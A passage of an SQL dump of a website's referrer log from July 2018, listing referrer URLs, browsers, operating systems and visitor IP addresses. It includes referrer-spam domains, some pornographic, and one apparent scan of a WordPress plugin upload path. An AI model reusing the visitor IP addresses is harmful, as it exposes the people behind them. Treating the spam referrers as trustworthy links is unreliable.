,'23.0.1271.64','','165.227.224.103','000',2,0),(32542,'2018-07-01','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(32543,'2018-07-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(32544,'2018-07-01','http://pornoelita.info/','Opera','Windows','7.54','','176.8.89.165','000',1,0),(32545,'2018-07-01','http://www.stavimdveri.ru/sitemap.html','Opera','Windows','7.11','','46.119.121.187','000',2,0),(32546,'2018-07-02','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',29,0),(32547,'2018-07-02','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(32548,'2018-07-02','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(32549,'2018-07-02','https://luckybull.io/','Opera','Windows','7.11','','178.137.83.231','000',1,0),(32550,'2018-07-02','https://zphiblgz.org','panscient','Unknown','Unknown','','71.127.222.133','000',170,0),(32551,'2018-07-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.227.71.124','000',4,0),(32552,'2018-07-02','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.19','000',2,0),(32553,'2018-07-02','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.11','000',1,0),(32554,'2018-07-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(32555,'2018-07-02','http://shops-ru.ru/','Opera','Windows','6.01','','178.137.83.231','000',1,0),(32556,'2018-07-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1836.AHmqrZQMfK5vZsGLr0fm4M9U5Cw93gvAmxPt2iblcYY.88d8cb16f777f583e0e5169a9ffdf4b195a77353&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040bGtUV2lkYWJfTi1oXzJQLXZWek1ldFMxMVRiSDFTbVZES25WY1F2ekxtUSws&sign=b108347ab4513c09d5bae0eb17e960cc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.105.53','000',2,0),(32557,'2018-07-02','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1836.8aNFiFpQK1yoHfv_SRFFaHjfNRVEcrWTJjEUMp-ScYY.8d2b00ef0c1af04a12922bb6b773e2b4153199dc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Y2VUdVd2ZDU0TFphTVZKWXNzQTFRUjJ2NTJCYVlZZWFFTDQ0Q1BoR2lvZyws&sign=c1eaec7e8d7535893f1d53be137fa9d1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.110.152','000',2,0),(32558,'2018-07-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1836.BCthxkksf0K-9Chd3i3I_MbTtxFbyiOz6itKAeaepnA.614b137dc4f2ab2aa338e474c406b505329a787d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZmZPLXlqb0E4bllQWXk3dXljSUFSbG9LX0ZJWklEc2k2azl1SW0tOWp4QSws&sign=928f3cef9bf94dcd43bb5337499d1ee9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.12.212','000',2,0),(32559,'2018-07-02','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1836.rXjlyNmKXI0BSD6qU86sRvJcD5NRAcbuIYNbA9Q9BaA.5a1d65d01fc22d779e73d193d90200e96db7034c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Q3lJTTNxOGloWGpOeUUtUFBhdDRTZzZBMlVlRXFpNXVhUEdNN05WWVBLQSws&sign=c3a9bdebc6bf96eeb5d9ceb84924761e&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.139','000',2,0),(32560,'2018-07-02','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(32561,'2018-07-02','https://vzheludke.com/','MSIE','Windows','6.0','','176.8.89.165','000',4,0),(32562,'2018-07-02','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(32563,'2018-07-02','https://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.75','000',2,0),(32564,'2018-07-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(32565,'2018-07-02','https://odiabetikah.com/','MSIE','Windows','6.0','','46.119.121.187','000',4,0),(32566,'2018-07-02','https://zphiblgz.org','Firefox','Windows','40.1','','81.242.56.2','000',2,0),(32567,'2018-07-02','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(32568,'2018-07-02','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(32569,'2018-07-02','http://shnyagi.net/','MSIE','Windows','7.0','','46.119.121.187','000',2,0),(32570,'2018-07-02','https://zphiblgz.org','Firefox','Windows','40.1','','109.110.29.41','000',2,0),(32571,'2018-07-02','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.121','000',2,0),(32572,'2018-07-02','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(32573,'2018-07-02','https://luckybull.io/','MSIE','Windows','6.0','','46.185.119.21','000',2,0),(32574,'2018-07-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(32575,'2018-07-02','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(32576,'2018-07-02','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(32577,'2018-07-02','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjPkZTd5YDcAhVCtlMKHX0fC00QFghOMAY&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','206.80.128.15','000',2,0),(32578,'2018-07-02','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(32579,'2018-07-02','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(32580,'2018-07-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.56','000',5,0),(32581,'2018-07-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.37','000',19,0),(32582,'2018-07-02','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.37','000',1,0),(32583,'2018-07-02','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','78.46.156.169','000',1,0),(32584,'2018-07-02','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.133.156','000',1,0),(32585,'2018-07-02','http://www.zphiblgz.org:80/','Chrome','Windows','66.0.3359.117','','198.143.133.155','000',1,0),(32586,'2018-07-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(32587,'2018-07-02','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(32588,'2018-07-02','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.61.149.214','000',1,0),(32589,'2018-07-02','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.126','000',1,0),(32590,'2018-07-02','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(32591,'2018-07-02','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(32592,'2018-07-02','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32593,'2018-07-02','https://documentserver.net/','Opera','Windows','7.54','','178.137.83.231','000',2,0),(32594,'2018-07-02','https://zphiblgz.org','Firefox','Windows','40.1','','201.143.67.252','000',2,0),(32595,'2018-07-02','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.79.163.215','000',2,0),(32596,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(32597,'2018-07-03','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(32598,'2018-07-03','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(32599,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(32600,'2018-07-03','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32601,'2018-07-03','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32602,'2018-07-03','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.192.138','000',2,0),(32603,'2018-07-03','https://zphiblgz.org','MSIE','Windows','9.0','','23.101.169.3','000',2,0),(32604,'2018-07-03','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(32605,'2018-07-03','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.189','000',1,0),(32606,'2018-07-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','37.187.180.18','000',1,0),(32607,'2018-07-03','http://elementspluss.ru/','MSIE','Windows','6.0','','46.119.115.156','000',1,0),(32608,'2018-07-03','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(32609,'2018-07-03','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','144.76.162.206','000',2,0),(32610,'2018-07-03','https://zphiblgz.org/ts_teams/lillet-williams-2/','AppleWebKit','Windows','534','','65.55.210.147','000',1,0),(32611,'2018-07-03','https://zphiblgz.org','Firefox','Linux','18.0','','188.93.56.216','000',2,0),(32612,'2018-07-03','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.71','000',1,0),(32613,'2018-07-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.189.227.50','000',4,0),(32614,'2018-07-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.27','000',2,0),(32615,'2018-07-03','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(32616,'2018-07-03','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(32617,'2018-07-03','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(32618,'2018-07-03','zphiblgz.org','Chrome','Windows','46.0.2754.75','','37.187.132.5','000',2,0),(32619,'2018-07-03','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','73.212.72.226','000',2,0),(32620,'2018-07-03','https://sportwizard.ru/','Unknown','Unknown','Unknown','','46.119.121.187','000',1,0),(32621,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(32622,'2018-07-03','https://www.google.com/','Chrome','Android','67.0.3396.87','','107.77.253.3','000',7,0),(32623,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(32624,'2018-07-03','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(32625,'2018-07-03','http://lerporn.info/','MSIE','Windows','6.0','','176.8.89.165','000',3,0),(32626,'2018-07-03','https://zphiblgz.org','Firefox','Windows','32.0','','210.1.225.79','000',1,0),(32627,'2018-07-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(32628,'2018-07-03','https://zphiblgz.org','Firefox','Windows','40.1','','183.82.179.19','000',2,0),(32629,'2018-07-03','http://mobile.regionshop.biz/','Unknown','Unknown','Unknown','','178.137.83.231','000',2,0),(32630,'2018-07-03','https://zphiblgz.org','Firefox','Windows','40.1','','81.17.190.89','000',2,0),(32631,'2018-07-03','https://zphiblgz.org','python-requests','Unknown','2.18.4','','94.177.250.40','000',2,0),(32632,'2018-07-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.220.101.12','000',1,0),(32633,'2018-07-03','https://zphiblgz.org','Firefox','Windows','40.1','','73.226.24.58','000',2,0),(32634,'2018-07-03','https://zphiblgz.org','Firefox','Windows','58.0','','195.154.173.101','000',7,0),(32635,'2018-07-03','https://www.atyks.ru/','MSIE','Windows','6.0','','46.119.121.187','000',5,0),(32636,'2018-07-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.74.66','000',1,0),(32637,'2018-07-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.133.157','000',1,0),(32638,'2018-07-03','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','198.143.133.156','000',1,0),(32639,'2018-07-03','https://zphiblgz.org','redback','Unknown','v0','','109.236.8.8','000',3,0),(32640,'2018-07-03','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(32641,'2018-07-03','http://hard-porn.mobi/','Unknown','Unknown','Unknown','','46.119.115.156','000',2,0),(32642,'2018-07-03','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(32643,'2018-07-03','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(32644,'2018-07-03','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(32645,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(32646,'2018-07-03','http://zphiblgz.org/','Firefox','Windows','33.1','','109.184.16.134','000',3,0),(32647,'2018-07-03','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(32648,'2018-07-03','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(32649,'2018-07-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.185.199','000',2,0),(32650,'2018-07-04','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(32651,'2018-07-04','https://zphiblgz.org','Safari','iPhone','9.0','','221.197.253.91','000',1,0),(32652,'2018-07-04','https://zphiblgz.org','Safari','iPhone','9.0','','58.248.206.69','000',1,0),(32653,'2018-07-04','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.27','000',1,0),(32654,'2018-07-04','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(32655,'2018-07-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','51.15.53.83','000',1,0),(32656,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838.4twowQ91AJOmakIgZVvQSSpy6eiWDOK82QHy8qNBZSI.5d2405d3fefb7aacf0b0908cbf3b6bb8a4fc7978&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UUFqWHBDUUI5eEY5U0JhV0E1Q3V6dFRNRHVhS0U0d01XVGhITFZGVlRXQSws&sign=278f8d4c7a972c3ae66c0bf4e9018de2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.32.62.219','000',2,0),(32657,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838.OnLIuPfOPaK8LMuri0KIuNOaUs3OYews-hlEUBxG0yg.03ea72835f060dd0c1be8eb45e29654ad61ce8be&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043eWRYOE4welYwYkpEQlEwU254RUwwRHZzandJNURuay1NSkNld25tRDd1QSws&sign=a403d861d04da572b7df82aeffac502f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.63','000',2,0),(32658,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838.Aikf9OpQGSjHS_KzyEwWq-QTo3h9CSY6cnF0QkzOVpQ.b6a028fdec2f22fc5b08c28f00968b72350329a9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043eVE5NzVabUZJTG41SHdaemdWejQtUXYwNGg0c01qbG9pWVJLVUxVa2thZyws&sign=70da4cdb8396f227ce724379fdfc0c07&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.213.12','000',2,0),(32659,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838.apo6kRDBLv8IVQGUa808jKq8HjtV31RsiSG6Rpd_v3s.a8341438e4f6995f930b59f24e32f8d3a91c139a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UWJsT1JoZ0k1SEthdlRsR0UyNm5yUlo3UVplUW5LZHdfWnBmaTNtQkhJUSws&sign=b27b164ed1bc0806a4f384e64c86ba96&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.166.33','000',2,0),(32660,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838.ObSwGoPujGOSGSdszknzW-mk3n_UpFYIZRhlJGhdyOI.9663e251189f719be2256f522ddc9f2648877148&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dkJ1MzF5UWQ1QXpxNjdza1M3cVVBekwtNFhGT2tKYmFKZ3lKZjVrT3NmZyws&sign=64924650d3f0429746511404a8001237&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.48','000',2,0),(32661,'2018-07-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','14.141.107.206','000',3,0),(32662,'2018-07-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1838._b3Zv0cGCc1_bjblanlH7KzacrYzB5YxpmA5Sz0oBss.36aebd3f3d164f20e78b95a25ea0de3ad480ad70&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043WDFpelVVRXJYdU9RZjVhSmpDOXJZZ2tUMVYxOFRlNGFlYWNwSEZKNVJHUSws&sign=39a35e7885df81dfd62d0242d8668bd0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.97','000',2,0),(32663,'2018-07-04','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','195.154.59.173','000',1,0),(32664,'2018-07-04','http://moneyzzz.ru/','Opera','Windows','7.54','','176.8.89.165','000',3,0),(32665,'2018-07-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',3,0),(32666,'2018-07-04','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(32667,'2018-07-04','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(32668,'2018-07-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(32669,'2018-07-04','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.136','000',1,0),(32670,'2018-07-04','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32671,'2018-07-04','https://zphiblgz.org','Firefox','Windows','40.1','','180.190.66.171','000',2,0),(32672,'2018-07-04','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','46.101.9.216','000',2,0),(32673,'2018-07-04','http://shnyagi.net/','Opera','Windows','6.01','','46.119.121.187','000',1,0),(32674,'2018-07-04','https://www.google.com/','Safari','iPhone','11.0','','107.77.234.139','000',1,0),(32675,'2018-07-04','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(32676,'2018-07-04','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(32677,'2018-07-04','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.209','000',1,0),(32678,'2018-07-04','https://luckybull.io/','Opera','Windows','6.01','','178.137.83.231','000',1,0),(32679,'2018-07-04','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(32680,'2018-07-04','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.199.137.203','000',2,0),(32681,'2018-07-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(32682,'2018-07-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(32683,'2018-07-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32684,'2018-07-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(32685,'2018-07-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(32686,'2018-07-04','https://eduserver.net/','Opera','Windows','7.0','','178.137.83.231','000',1,0),(32687,'2018-07-04','https://zphiblgz.org','Chrome','Windows','53.0.2787.5','','23.94.68.254','000',1,0),(32688,'2018-07-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(32689,'2018-07-04','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(32690,'2018-07-04','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(32691,'2018-07-04','http://zphiblgz.org/wp-content/plugins/wp-formgenerator/uploads/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(32692,'2018-07-04','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(32693,'2018-07-04','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(32694,'2018-07-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.131','000',1,0),(32695,'2018-07-04','http://zphiblgz.org:80/','Chrome','Windows','66.0.3359.117','','107.6.171.130','000',1,0),(32696,'2018-07-04','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(32697,'2018-07-04','http://skinali.photo-clip.ru/','Opera','Windows','7.11','','46.119.115.156','000',2,0),(32698,'2018-07-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32699,'2018-07-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.32.120.135','000',1,0),(32700,'2018-07-04','http://zphiblgz.org/','Chrome','Windows','33.0.1750.146','','193.169.252.46','000',3,0),(32701,'2018-07-04','https://www.google.com/','Edge','Windows','17.17134','','76.187.2.186','000',2,0),(32702,'2018-07-04','https://zphiblgz.org','MSIE','Windows','7.0','','204.101.161.159','000',4,0),(32703,'2018-07-04','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(32704,'2018-07-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(32705,'2018-07-04','https://zphiblgz.org/','Firefox','Windows','32.1','','178.159.37.18','000',3,0),(32706,'2018-07-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.158.182','000',2,0),(32707,'2018-07-04','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','151.80.126.210','000',2,0),(32708,'2018-07-05','https://www.google.com/','Chrome','Windows','67.0.3396.99','','173.239.210.14','000',2,0),(32709,'2018-07-05','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',2,0),(32710,'2018-07-05','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(32711,'2018-07-05','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(32712,'2018-07-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(32713,'2018-07-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32714,'2018-07-05','http://xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32715,'2018-07-05','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','94.16.113.228','000',1,0),(32716,'2018-07-05','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(32717,'2018-07-05','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(32718,'2018-07-05','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(32719,'2018-07-05','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',2,0),(32720,'2018-07-05','https://zphiblgz.org','Chrome','Windows','46.0.2490.71','','91.243.93.184','000',1,0),(32721,'2018-07-05','https://zphiblgz.org','Firefox','Linux','41.0','','79.110.19.105','000',1,0),(32722,'2018-07-05','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',2,0),(32723,'2018-07-05','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(32724,'2018-07-05','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.30','000',1,0),(32725,'2018-07-05','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(32726,'2018-07-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1839.Zg1B-7o26RQcYJOuRIpzVC4jEfPdZTeWVpbj97DuC2I.b16642e654c8827764d12cffe23ac526b07ddad0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040RVN3NnR1X0xodnY2LThUVmNhbDdaa01ZY2d2eXFRemZ1NWNhOFhkeEdWZyws&sign=b60e6d8b59ca05f8f7926acf887c82ee&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.20.44','000',2,0),(32727,'2018-07-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1839.5G-dznBzS0SklidkCVeaChSEnl5grgerFfa_P1jmrzg.2a1e6897c5e39e1d169242695c9ef1ccb28eaaed&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TDNEQ2ZwUUp5ZDF0MldZV1JCcjBJWDVvVU9FRVFtcFBjZS1raHlaRzFHdyws&sign=cd6d96e0dbad860b1563ad219685b433&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(32728,'2018-07-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1839.sUOlAurGs00ApkvAkJ1STHdDj75IYFMIrd19mPc9pX0.3de5d48f92a9f268caeaea06a7a792219a2a84ba&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Yk1TWkdGcTB6a